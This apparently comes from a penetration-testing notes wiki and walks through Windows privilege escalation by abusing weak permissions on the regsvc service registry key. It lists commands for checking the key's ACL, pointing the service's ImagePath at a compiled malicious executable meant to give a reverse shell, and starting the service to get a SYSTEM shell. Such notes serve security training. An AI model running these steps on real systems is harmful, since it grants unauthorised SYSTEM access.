Regsvc ACL

Overview

After enumeration, if it's discovered that we have full permissions to a registry key, we can compile a malicious executable written in C and get it to run a command for us as system

Escalation via Regsvc

View permissions on registry key

powershell -exec bypass -NoP
Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl

Change the command to get a reverse shell and compile the executable

x86_64-w64-mingw32-gcc windows_service.c -o x.exe

Add the executable to the service

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f

/v - What is the value name
ImagePath - Is a registry key that contains the path of the drivers image file
- So if you place the file here and run the service it will run the executable
/t - type being REG_EXPAND_SZ which is running a string value
/d - Data being C:\temp\x.exe ; data you want to use
/f - No prompts for confirmation just execute

Start the service and pop a shell

sc start regsvc

PreviousAlwaysInstallElevated Nextwhoami /priv